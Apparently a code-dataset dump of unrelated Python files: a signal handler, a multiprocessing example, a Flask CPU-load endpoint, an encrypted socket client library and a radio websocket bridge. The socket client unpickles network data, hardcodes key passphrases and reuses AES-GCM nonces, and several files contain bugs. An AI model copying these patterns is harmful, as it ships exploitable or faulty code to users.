def clean_up_reg(signal, frame):
"""
When 'cppython remote_port_forward.py' gets a SIGTERM, config_store_receiver.py doesn't
clean up registrations. Even if it did, the comm module can't rely on an external service
to clean up.
"""
EventingCSClient('CSClient').stop()
sys.exit(0)
signal.signal(signal.SIGTERM, clean_up_reg)
|
multiprocessing_terminate.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import multiprocessing
import time
def slow_worker():
print('Starting worker')
time.sleep(0.1)
print('Finished worker')
if __name__ == '__main__':
p = multiprocessing.Process(target=slow_worker)
print('BEFORE:', p, p.is_alive())
p.start()
print('DURING:', p, p.is_alive())
p.terminate()
print('TERMINATED:', p, p.is_alive())
p.join()
print('JOINED:', p, p.is_alive())
|
app.py
|
from flask import Flask, request
from math import factorial
from threading import Thread
import signal
import time
# This class generates load by running math.factorial() over a period of time
class Load:
should_stop = False
def stop(self):
should_stop = True
def run(self, cpu_usage: float, seconds: float):
if cpu_usage > 1.0:
print('CPU usage cannot be above 100%!')
else:
start_time = time.time()
while not self.should_stop:
cycle_time = time.time()
if cycle_time - start_time >= seconds:
self.should_stop = True
while time.time() - cycle_time < cpu_usage:
factorial(100)
time.sleep(1.0 - cpu_usage)
self.should_stop = False
app = Flask(__name__)
load = Load()
# Endpoint to generate load
@app.route('/killme')
def killme():
cpu_usage = float(request.args.get('usage', 0.8))
length = float(request.args.get('time', 30))
thread = Thread(target=load.run, args=(cpu_usage, length,))
thread.daemon = True
thread.start()
return f'Creating CPU load of {cpu_usage * 100.0}% for {length} seconds in the background'
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
Sclient_py.py
|
import os
import socket
import base64
import pickle
import threading
import multiprocessing
import hashlib
import random
import yaml
import datetime
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
class IPNC():
def __init__(self):
pass
def read_yml(self,file = None):
with open(file) as file:
documents = yaml.full_load(file)
return documents
def write_yml(self,file = None, dict_data = None,mode = "a+"):
with open(file, mode) as file:
yaml.dump(dict_data, file)
def add_node(self,file = None, node = None):
try:
read = self.read_yml(file)
if read != None:
read[node[0]]
self.change_node_value(file,node)
else:
raise KeyError
except KeyError:
node_dict = {
node[0] : node[1]
}
self.write_yml(file, node_dict)
def change_node_value(self,file = None, node = None):
r_yml = self.read_yml(file)
r_yml[node[0]] = node[1]
self.write_yml(file = file, dict_data = r_yml, mode = "w")
def get_node(self,file = None, key = None, wait = True):
# print(key)
if key == None:
return self.read_yml(file)
if wait:
while True:
r_yml = self.read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
# print("key not found")
pass
except TypeError:
pass
else:
r_yml = self.read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
# print("key not found")
return None
except TypeError:
pass
def remove_node(self,file,node):
try:
r_yml = self.read_yml(file = file)
r_yml[node]
r_yml.pop(node)
self.write_yml(file = file, dict_data = r_yml, mode = "w")
except KeyError:
print("key not found")
#pass
except:
pass
def name_generator(self,_len_ = 16, onlyText = False):
lower_case = list("abcdefghijklmnopqrstuvwxyz")
upper_case = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
special = list("!@#$%&*?")
number = list("0123456789")
if onlyText:
_all_ = lower_case + upper_case
else:
_all_ = lower_case + upper_case + special + number
random.shuffle(_all_)
return "".join(random.sample(_all_,_len_))
def code001_AN(self,file = None, key = None ,target_key = None, value = None, first_time = False):
read = self.get_node(
file = file,
key = key,
wait = False
)
if read is not None:
read[target_key] = value
self.add_node(
file = file,
node = [
key,
read
]
)
else:
self.add_node(
file = file,
node = [
key,
{target_key : value}
]
)
def code001_UN(self,file = None, key = None, target_key = None, position : int = None, value = None):
read = self.get_node(
file = file,
key = key,
wait = False
)
if read is not None:
if position == None:
read[target_key] = value
else:
base = read[target_key]
base.pop(position)
base.insert(position,value)
read[target_key] = base
self.add_node(
file = file,
node = [
key,
read
]
)
class DspError(Exception):
def __init__(self,err_msg):
print(err_msg)
class Main(IPNC):
def __init__(self,client_name : str = None, file : str = None, debug : bool = False, rememberServer = True, MPCL : bool = False, MTCL : bool = True):
IPNC.__init__(self)
self.__debug = debug
if not file:
raise TypeError("__init__() missing 1 required positional argument: 'file'")
else:
self.__file_location = file
# self.__client_name = hashlib.sha256(bytes(client_name,"utf-8")).digest()
self.__client_name = client_name
if MPCL and MTCL:
raise ValueError("both 'MPCL' abd 'MTCL' should not be set to True")
elif not MPCL and not MTCL:
raise ValueError("both 'MPCL' abd 'MTCL' should not be set to False")
else:
self.__MPCL = MPCL
self.__MTCL = MTCL
self.__CUSTOM_CHANNEL = []
self.__MESSAGE_HANDLER = []
self.__CALLBACK_LOOP = []
self.__SENDER_QUEUE = []
self.HS_Devices = []
self.__KEY_STORE ={}
if rememberServer:
__get = self.get_node(file = self.__file_location,key = hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(), wait = False)
if __get == None:
self.add_node(
file=self.__file_location,
node=[
hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(),
pickle.dumps(False)
]
)
__code003_hs_key = self.get_node(
file = self.__file_location,
key = "key",
wait = False
)
if __code003_hs_key is not None:
# print(f"__code003_hs_key : {__code003_hs_key}")
self.__KEY_STORE = __code003_hs_key
self.HS_Devices = [k for (k,v) in __code003_hs_key.items() if v[0] == "varified"]
__code001_key = self.get_node(
file = self.__file_location,
key = "code_001_srt_key",
wait = False
)
if __code001_key is not None:
if __code001_key["status"] == "varified":
self.__KEY_STORE["code_001_srt_key"] = __code001_key["key"]
self.__CUSTOM_CHANNEL.append("DSP_MSG")
self.__VARIFIED = self.get_node(
file = self.__file_location,
key = hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(),
wait = False
)
self.__VARIFIED = pickle.loads(self.__VARIFIED)
def __load_object(self, data = None, secure : bool = True, key_dict : bytes = None):
if not data:
raise TypeError("__load_object() missing one positional argument 'data'")
if secure:
if not key_dict:
raise TypeError("__load_object() missing one positional argument 'key_dict', it is compulsory when secure is set to True")
else:
pass
loaded = pickle.loads(base64.b64decode(data))
if loaded["secure"] and secure:
key_pack = pickle.loads(base64.b64decode(key_dict["code_001_srt_key"]))
aes_gcm = AESGCM(key_pack["aes_key"])
decryptedtext = aes_gcm.decrypt(
nonce = key_pack["nonce"],
data = loaded["data"],
associated_data = key_pack["aad"]
)
unflatted = pickle.loads(base64.b64decode(decryptedtext))
return unflatted
elif not secure and not loaded["secure"]:
unflatted = pickle.loads(base64.b64decode(loaded["data"]))
return unflatted
def __serializer(self, object = None, secure : bool = True, key_dict : bytes = None):
if not object:
raise TypeError("__load_object() missing one positional argument 'data'")
else:
if type(object) != type({1:"a"}):
raise TypeError(f"__serializer() 'object' argument should be of type {type({'a':1})}")
if secure:
if not key_dict:
raise TypeError("__load_object() missing one positional argument 'key_dict', it is compulsory when secure is set to True")
# target = object["target_name"]
normalize = base64.b64encode(pickle.dumps(object))
if secure:
key_pack = pickle.loads(base64.b64decode(key_dict["code_001_srt_key"]))
aes_gcm = AESGCM(key_pack["aes_key"])
cyphertext = aes_gcm.encrypt(
nonce = key_pack["nonce"],
data = normalize,
associated_data = key_pack["aad"]
)
prepare_serialized_data = {"secure" : secure, "sender_name" : self.__client_name, "data" : cyphertext}
flatten_psd = base64.b64encode(pickle.dumps(prepare_serialized_data))
return flatten_psd
else:
prepare_serialized_data = {"secure" : secure, "sender_name" : self.__client_name, "data" : normalize}
flatten_psd = base64.b64encode(pickle.dumps(prepare_serialized_data))
return flatten_psd
def CLIENT(self,address : str = None, port : int = None,timeout : int = 1):
if self.__debug:
print("[Connecting TO Server]")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((address, port))
if self.__debug:
print("[Connected]")
receiver_thread = threading.Thread(target=self.__receiver)
sender_thread = threading.Thread(
target = self.__sender,
args = (self.sock, self.__SENDER_QUEUE)
)
if self.__MTCL:
callback_loop_thread_process = threading.Thread(
target = self.__callback_lopp,
args = (self.__CALLBACK_LOOP,)
)
else:
callback_loop_thread_process = multiprocessing.Process(
target = self.__callback_loop,
args = (self.__CALLBACK_LOOP,)
)
receiver_thread.daemon = True
sender_thread.daemon = True
callback_loop_thread_process.daemon = True
receiver_thread.start()
sender_thread.start()
callback_loop_thread_process.start()
if not self.__VARIFIED:
code_001_srt_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
code_001_key = code_001_srt_key.public_key()
str_code_001_key = code_001_key.public_bytes(
serialization.Encoding.OpenSSH,
serialization.PublicFormat.OpenSSH
).decode()
OBJECT = self.__serializer(
object = {"type" : "code-1.0.0-new", "username" : self.__client_name, "data" : str_code_001_key},
secure = False
)
self.sock.send(str(len(OBJECT)).center(16,"|").encode("utf-8"))
self.sock.send(OBJECT)
# self.code001_AN(
# file = self.__file_location,
# key = "code_001_srt_key",
# target_key =
# )
self.add_node(
file = self.__file_location,
node = [
# hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest(),
"code_001_srt_key",
{
"status" : "unvarified",
"key" : code_001_srt_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.BestAvailableEncryption(
b'aw56hfseyinhy7fce4ser')
)
}
]
)
count_time = datetime.datetime.now() + datetime.timedelta(minutes = timeout)
while datetime.datetime.now() <= count_time and not self.__VARIFIED:
pass
if not self.__VARIFIED:
raise TimeoutError("could not varified by server, try again!")
else:
OBJECT = self.__serializer(
object = {"type" : "_", "username" : self.__client_name, "data" : ""},
secure = False
)
self.sock.send(str(len(OBJECT)).center(16,"|").encode("utf-8"))
self.sock.send(OBJECT)
def __receiver(self):
while True:
if not self.__VARIFIED:
data_len = int(self.sock.recv(16).decode().strip("|"))
if not data_len:
self.sock.close()
# pair -a1.1
#need future attention----------------------------------------------------------------------
else:
recv_data = self.sock.recv(data_len)
_info = self.__load_object(
data = recv_data,
secure = False
)
# print(f"_info_ : {_info}")
# _info = {"type" = "code-0.0.1-key-res", "sender_name" : "SERVER", "data" : "encrypted aes key pack"}
if _info["type"] == "code-1.1.0-new" and _info["sender_name"] == "SERVER":
code001_key_load = self.get_node(
file = self.__file_location,
# key = hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest()
key = "code_001_srt_key"
)
# print(code001_key_load)
if code001_key_load["status"] == "unvarified":
code_001_srt_key = serialization.load_pem_private_key(
data = code001_key_load["key"],
password=b'aw56hfseyinhy7fce4ser',
backend=default_backend()
)
key_pack = code_001_srt_key.decrypt(
ciphertext = _info["data"],
padding = padding.OAEP(
mgf = padding.MGF1(
algorithm = hashes.SHA256()
),
algorithm = hashes.SHA256(),
label = None
)
)
self.add_node(
file = self.__file_location,
node = [
# hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest(),
"code_001_srt_key",
{
"status" : "varified",
"key" : key_pack
}
]
)
self.__KEY_STORE["code_001_srt_key"] = key_pack
OBJECT = {
"type" : "code-1.1.1-new",
"sender_name" : self.__client_name,
"target_name" : "SERVER",
"data" : hashlib.sha256(bytes("saved","utf-8")).digest()
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
self.__VARIFIED = True
self.add_node(
file = self.__file_location,
node=[
hashlib.sha256(
bytes("__VARIFIED", "utf-8")).digest(),
pickle.dumps(True)
]
)
else:
data_len = int(self.sock.recv(16).decode().strip("|"))
if not data_len:
self.sock.close()
# pair -a1.2
else:
recv_data = self.sock.recv(data_len)
code_002 = self.__load_object(
data = recv_data,
secure = True,
key_dict = self.__KEY_STORE
)
# code_002 = {"type" = "xyz", "bypass-pipe" : "SERVER", "sender_name" : "xyz", "target_name" : "abc", "data" : "pqr"}
# handshake counter part
if code_002["type"] == "DSP_REQ":
if code_002["target_name"] == self.__client_name:
M_code002_k_pack = {
"aes_key" : AESGCM.generate_key(256),
"nonce" : os.urandom(32),
"aad" : bytes(self.name_generator(),"utf-8"),
"approved" : True
}
normalized_M_code002_k_pack = base64.b64encode(pickle.dumps(M_code002_k_pack))
rsa_key =load_ssh_public_key(
bytes(code_002["data"],"utf-8"),
backend=default_backend()
)
ciphertext = rsa_key.encrypt(
normalized_M_code002_k_pack,
padding.OAEP(
mgf = padding.MGF1(algorithm = hashes.SHA256()),
algorithm = hashes.SHA256(),
label = None
)
)
OBJECT = {
"type" : "DSP_HR-L1",
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : code_002["sender_name"],
"data" : ciphertext
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
del M_code002_k_pack["approved"]
code001_AN_value = base64.b64encode(pickle.dumps(M_code002_k_pack))
self.code001_AN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
value = ["unvarified",code001_AN_value]
)
self.__KEY_STORE[code_002["sender_name"]] = ["unvarified",code001_AN_value]
if self.__debug:
print(f"HS from : {code_002['sender_name']} | step_1 Done")
# code_002 = {"type" = "xyz", "bypass-pipe" : "SERVER", "sender_name" : "xyz", "target_name" : "abc", "data" : "pqr"}
# type DSP-HR counter part
elif code_002["type"] == "DSP_HR-L1":
if code_002["target_name"] == self.__client_name:
flatten_key = pickle.loads(base64.b64decode(self.__KEY_STORE[code_002["sender_name"]]))[1]
loaded_code_003_srt = serialization.load_pem_private_key(
data = flatten_key,
password = b'oieffjwouifh2398r29r8238h38h923h8983',
backend = default_backend()
)
__code_003_aes_srt = loaded_code_003_srt.decrypt(
ciphertext = code_002["data"],
padding = padding.OAEP(
mgf = padding.MGF1(
algorithm = hashes.SHA256()
),
algorithm = hashes.SHA256(),
label = None
)
)
__code_003_aes_srt = pickle.loads(base64.b64decode(__code_003_aes_srt))
if __code_003_aes_srt["approved"]:
OBJECT = {
"type" : "DSP_HR-L2",
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : code_002["sender_name"],
"data" : hashlib.sha256(bytes("approved","utf-8")).digest()
}
del __code_003_aes_srt['approved']
__code_003_aes_srt = base64.b64encode(pickle.dumps(__code_003_aes_srt))
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
self.code001_UN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
position = None,
value = ["varified",__code_003_aes_srt]
)
self.__KEY_STORE[code_002["sender_name"]] = base64.b64encode(pickle.dumps(["varified",__code_003_aes_srt]))
self.HS_Devices.append(code_002["sender_name"])
print("Done")
# "DSP-HRR-L1" counter part
elif code_002["type"] == "DSP_HR-L2":
if code_002["target_name"] == self.__client_name:
if code_002["data"] == hashlib.sha256(bytes("approved","utf-8")).digest():
self.code001_UN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
position = 0,
value = "varified"
)
self.__KEY_STORE[code_002["sender_name"]] = base64.b64encode(pickle.dumps(
[
"varified",
self.__KEY_STORE[code_002["sender_name"]][1]
]
)
)
self.HS_Devices.append(code_002["sender_name"])
print(f"Handshake from {code_002['sender_name']} Done")
elif code_002["type"] == "DSP_MSG":
code_004_key = self.__KEY_STORE[code_002["sender_name"]]
code_004_key = pickle.loads(base64.b64decode(code_004_key[1]))
aes_gcm = AESGCM(code_004_key["aes_key"])
decryptedtext = aes_gcm.decrypt(
nonce = code_004_key["nonce"],
data = code_002["data"],
associated_data = code_004_key["aad"]
)
data = pickle.loads(base64.b64decode(decryptedtext))
code_002["data"] = data
self.__MESSAGE_HANDLER.append(code_002)
elif code_002["type"] in self.__CUSTOM_CHANNEL:
self.__MESSAGE_HANDLER.append(code_002)
def __sender(self, sock, __sender_queue):
while True:
for i,data in enumerate(__sender_queue):
sock.send(str(len(data)).center(16,"|").encode("utf-8"))
sock.send(data)
__sender_queue.pop(i)
def __callback_lopp(self,__callback_lst):
while True:
for i,func in enumerate(__callback_lst):
__callback_lst.pop(i)
func[0](*func[1])
def CREATE_CHANNEL(self, channels : str = None, multiple : bool = False):
if not multiple:
if type[channels] == type([]):
raise ValueError("'channels' should be a string when multiple is set to False.")
if multiple:
if type(channels) is type([]):
for channel in channels:
if channel not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel)
else:
if channels not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channels)
def HANDSHAKE(self,target_name : str = None):
if self.__debug:
print("Doing Handshake...")
# target_name = hashlib.sha256(target_name).digest()
try:
check = self.__KEY_STORE[target_name]
except KeyError:
check = None
if check is not None:
if len(check) > 0 or check is None:
if self.__debug:
print(f"{target_name} : already handshaked OR have the request for handshake.")
else:
__code_002_srt_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
__code_002_pub_key = __code_002_srt_key.public_key()
str_code_002_pub_key = __code_002_pub_key.public_bytes(
serialization.Encoding.OpenSSH,
serialization.PublicFormat.OpenSSH
).decode()
# print(f"str_code_002_pub_key : {str_code_002_pub_key}") #===============
OBJECT = {
"type" : "DSP_REQ",
"bypass_pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : target_name,
"data" : str_code_002_pub_key
}
normalised = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalised)
__code_003_srt_key_str = __code_002_srt_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.BestAvailableEncryption(
b'oieffjwouifh2398r29r8238h38h923h8983')
)
self.code001_AN(
file = self.__file_location,
key = "key",
target_key = target_name,
value = [
"unvarified",
__code_003_srt_key_str
]
)
self.__KEY_STORE[target_name] = base64.b64encode(pickle.dumps(["unvarified",__code_003_srt_key_str]))
if self.__debug:
print("Handshake Request Send.")
def LISTEN(self,channel : str = None, function : object = None, args = None):
if not channel:
raise TypeError("LISTEN() missing 1 required positional argument: 'channel'")
else:
found = False
index = None
if channel in self.__CUSTOM_CHANNEL:
for i,d in enumerate(self.__MESSAGE_HANDLER):
if d["type"] == channel:
found = True
index = i
break
if found:
if not args:
p_data = self.__MESSAGE_HANDLER.pop(index)
self.__CALLBACK_LOOP.append([function,[p_data]])
else:
p_data = self.__MESSAGE_HANDLER.pop(index)
args = list(args)
args.insert(0,p_data)
self.__CALLBACK_LOOP.append([function,args])
def SEND(self,channel : str = None, data = None):
if not channel:
raise TypeError("SEND() missing 1 required positional argument: 'channel'")
if not data:
raise TypeError("SEND() missing 1 required positional argument: 'data'")
lst = [ [1,2], {"a":1}, (1,2), {1,2,}, "a", 12, 0.45, b"bytes" ]
allowed_lst= []
for l in lst:
allowed_lst.append(type(l))
if type(data) in allowed_lst:
if channel in self.__CUSTOM_CHANNEL:
prepare_send_data = {
"type" : channel,
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : "SERVER",
"data" : data
}
normalized = self.__serializer(
object = prepare_send_data,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
else:
raise TypeError(f"unallowed / untransmitable type of argument 'data', {type(data)}")
def SEND_TO_CLIENT(self, target_name : str = None, data = None):
if not target_name:
raise TypeError("SEND() missing 1 required positional argument: 'target_name'")
if not data:
raise TypeError("SEND() missing 1 required positional argument: 'data'")
lst = [ [1,2], {"a":1}, (1,2), {1,2,}, "a", 12, 0.45, b"bytes" ]
allowed_lst= []
for l in lst:
allowed_lst.append(type(l))
if type(data) in allowed_lst:
try:
code_004_key = self.__KEY_STORE[target_name]
except KeyError:
raise DspError(f"{target_name} is not registered/ handshaked client")
if code_004_key[0] == "varified":
__code_004_srt_key = pickle.loads(base64.b64decode(code_004_key[1]))
aes_gcm = AESGCM(__code_004_srt_key["aes_key"])
ciphertext = aes_gcm.encrypt(
nonce = __code_004_srt_key["nonce"],
data = base64.b64encode(pickle.dumps(data)),
associated_data = __code_004_srt_key["aad"]
)
OBJECT = {
"type" : "DSP_MSG",
"bypass-pipe" : "SERVER",
"target_name" : target_name,
"sender_name" : self.__client_name,
"data" : ciphertext
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
else:
raise TypeError(f"unallowed / untransmitable type of argument 'data', {type(data)}")
class Sclient():
def __init__(self,client_name : str = None, file : str = None, debug : bool = False, rememberServer = True, MPCL : bool = False, MTCL : bool = True):
__parent = Main(client_name,file,debug, rememberServer, MPCL,MTCL)
self.CLIENT = __parent.CLIENT
self.HS_Devices = __parent.HS_Devices
self.CREATE_CHANNEL = __parent.CREATE_CHANNEL
self.LISTEN = __parent.LISTEN
self.HANDSHAKE = __parent.HANDSHAKE
self.SEND = __parent.SEND
self.SEND_TO_CLIENT = __parent.SEND_TO_CLIENT
|
yodelEnvironment.py
|
#from yodel.errors import YodelError
from asyncio.exceptions import CancelledError
from json.decoder import JSONDecodeError
from types import FunctionType, LambdaType
from typing import Any, Callable, NoReturn, Dict
from websockets import exceptions
from websockets.exceptions import WebSocketException
from websockets.server import WebSocketServer
import yodel
import globals
from time import sleep
import websockets
import asyncio
import json
from threading import Thread
import sys
globalstdout = sys.stdout
def forceGuiPrint(*args):
globalstdout.write(' '.join((str(arg) for arg in args)))
globalstdout.flush()
'''
Existing yodel formats are cached Format obects created by the API
'''
existingYodelFormats = []
'''
The JavaScript API uses an enum (integer types) to depict python types,
so their association is layed out here.
'''
apiEnumToPyType = {
0: int,
1: str,
2: bytearray,
3: yodel.Flags
}
def insulatePassYodelCall(fn, data):
try:
fn(data)
except YodelError as e:
# Any yodel related errors are sent back up to the JS client to be thrown as JS errors
forceGuiPrint(str(e))
globals.outgoingMessages.put({"name":e.__name__,"message":str(e)})
'''
The following functions are designed to take in the 'kwargs' part of a JSON
request, and use them to make an yodel call with info from the call.
'''
def passYodelSendBasic(data):
'''The basic send function's kwargs are directly mapped'''
if(globals.gui):
forceGuiPrint(f"o{json.dumps(data)}")
yodel.send(data["payload"], name=data["name"], group=data["group"])
def passYodelSendSection(data):
'''
The Section sending function's kwargs give information about creating a new section.
E.X: {
payload: "...",
fields : {
"key" : value,
...
},
format : {
<format data, @see passYodelNewFormat>
}
group: "...",
name: "..."
}
'''
if(globals.gui):
forceGuiPrint(f"o{json.dumps(data)}")
sectionData = data["payload"]
section = yodel.Section(passYodelNewFormat(sectionData["format"]))
for key in sectionData["fields"]:
section[key]=sectionData["fields"][key]
section.payload = (sectionData["payload"]).encode()
yodel.send(section,name=data["name"], group=data["group"])
def passYodeljoinGroup(data) :
'''Kwargs mapps directly to the call'''
yodel.joinGroup(data["group"])
def passYodelSetName(data) :
'''Kwargs mapps directly to the call'''
yodel.setName(data["name"])
def passYodelNewField(data) -> yodel.Field :
'''
passYodelNewField creates a new field with the provided kwargs.
Example input:
{
name: "...",
type: 0-3,
args: [...],
min : 0->,
max : 0->,
bytes: 0->
}
'''
return yodel.Field(
data["name"],
apiEnumToPyType[int(data["type"])],
data["args"],
min=int(data["min"]),
max=int(data["max"]),
bytes=int(data["bytes"])
)
def passYodelNewFormat(data) -> yodel.Format:
'''
passYodelNewFormat takes info from kwargs and generates a new yodel.Format object.
Simply calling the constructor is enough to feed the Format to the internal yodel
functionality, but it is also cached in the API's scope through existingYodelFromats.
Fields are generated using the passYodelNewField function.
Example Input:
{
mtype: 1->,
fields: [
{
<yodel.Field data, @see passYodelNewField>
}
]
}
'''
# if this format exists already:
if data["mtype"] in existingYodelFormats:
# return existing Format definition
return yodel.globaldat.messages_types[data["mtype"]]
# If this format does not exist yet:
# add the 'mtype' type identifier to the cache list
existingYodelFormats.append(data["mtype"])
# Construct the yodel.Format by generating all the fields outlined in 'fields',
# and passing 'mtype':
return yodel.Format(
[
passYodelNewField(field) for field in data["fields"]
], mtype=int(data["mtype"]))
def passYodelleaveGroup(data) -> NoReturn:
yodel.leaveGroup(data["group"])
def passYodelToggleRelay(data) -> NoReturn:
yodel.toggleRelay(bool(data["relay"]))
def passYodelSetChannel(data) -> NoReturn:
yodel.setChannel(int(data["channel"]))
# yodelResponses contains all the callbacks for the API calls.
# So, when the JS sends over a request with {'action':'setName'}, the passYodelSetName function will be called
# as is seen below.
# The typehint here just means a dictionary with string keys, and API call functions
yodelResponses: Dict[str, Callable[[Dict[Any, Any]], Any]] = {
"sendBasic" : passYodelSendBasic,
"sendSection": passYodelSendSection,
"joinGroup" : passYodeljoinGroup,
"setName" : passYodelSetName,
"createFormat" : passYodelNewFormat,
"leaveGroup" : passYodelleaveGroup,
"toggleRelay" : passYodelToggleRelay,
"setChannel" : passYodelSetChannel
}
def yodelLoop() -> NoReturn:
'''
The yodelLoop is responsible for listening to yodel connections in its own thread.
'''
while True:
# Try wrapper for stability. Errors will still be printed for debugging.
try:
# check for incomming messages from the local yodel. (Non-blocking)
raw:yodel.Section = yodel.listen()
# if a message was found
if raw is not None:
# Use yodel's automatic decoding functionality to automaticall determine the fields etc... of the message
raw = yodel.autoDecode(raw)
# if the autoDecoded value is not bytes, it must be a Section object.
if not isinstance(raw, bytes):
raw = {"fields":raw.fields, "mtype":raw.format.mtype, "payload":raw.payload.decode()}
# otherwise, the autoDecoded value is a string, or maybe an integer. Either way, it is string encoded.
else:
raw = {"payload":raw.decode()}
# the message sent back to the JS has action of 'incoming' to show that it is a new message
# and the kwargs contain either the payload of a raw message,
# or the relevant section data of an encoded message.
message = json.dumps(
{
"action":"incoming",
"kwargs":raw
}
)
if(globals.gui):
forceGuiPrint(f"i{json.dumps(raw)}")
# The message (which is now just a string) can now be added to the global Queue
# where it will be picked up from the WebSocket thread, and sent to the JS.
globals.outgoingMessages.put(message)
except YodelError as e:
# Any yodel related errors are sent back up to the JS client to be thrown as JS errors
forceGuiPrint(str(e))
globals.outgoingMessages.put({"name":e.__name__,"message":str(e)})
async def checkIncomingJSON(sock:websockets.server.WebSocketServerProtocol) -> NoReturn:
'''
checkIncomingJSON waits for a new command from the JS client, and then activates the appropriate
yodelResponse.
@see yodelResponses
'''
# This is the main blocking call that needs to be timed out.
try:
# check for incoming requests from JS, timeout after 0.1 seconds
jsonRequest = await asyncio.shield( asyncio.wait_for( sock.recv(), 0.1) )
except CancelledError:
return
except asyncio.exceptions.TimeoutError:
return
try:
jsonRequest = json.loads(jsonRequest)
except json.JSONDecodeError as e:
forceGuiPrint(str(e))
action = jsonRequest["action"]
kwargs = jsonRequest["kwargs"]
#forceGuiPrint(jsonRequest)
#if ('channel' in kwargs):
# yodel.setChannel(int(kwargs["channel"]))
insulatePassYodelCall(yodelResponses[action],kwargs)
async def checkOutgoingJSON(sock:websockets.server.WebSocketServerProtocol) -> NoReturn:
'''
checkOutgoingJSON checks the global Queue for messages that are ready to be sent back to the JS client.
'''
if (globals.outgoingMessages.empty()):
return
await sock.send(
globals.outgoingMessages.get()
)
async def yodelSuite(sock:websockets.server.WebSocketServerProtocol, path):
'''
yodelSuite just combines the functionality of incoming and outgoing JSON coroutines
'''
# Client loop:
while True:
# check for any ready incoming messages from the JS
await checkIncomingJSON(sock)
# check for any ready outgoing messages to the JS
await checkOutgoingJSON(sock)
def beginServing():
'''
Basic setup for the WebSocket server, yodel, and a thread
'''
forceGuiPrint("Binding to port: ", globals.port)
# This combination will allow the websocket server to run on the asyncio
# event loop, and feed new connections through to the yodelSuite coroutine
asyncio.get_event_loop().run_until_complete(
websockets.serve(yodelSuite, globals.host, globals.port)
)
# Setup yodel with the radio device
yodel.startRadio(globals.yodelStartRadio)
# Yodel will be operated through its own thread because it doesn't play nice with asyncio.
# Yodel data is accepted in this thread, and given to the websocket thread through a global Queue
yodelThread = Thread(target=yodelLoop, daemon=True)
yodelThread.start()
# mainloop
asyncio.get_event_loop().run_forever()
# uncreached
yodelThread.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.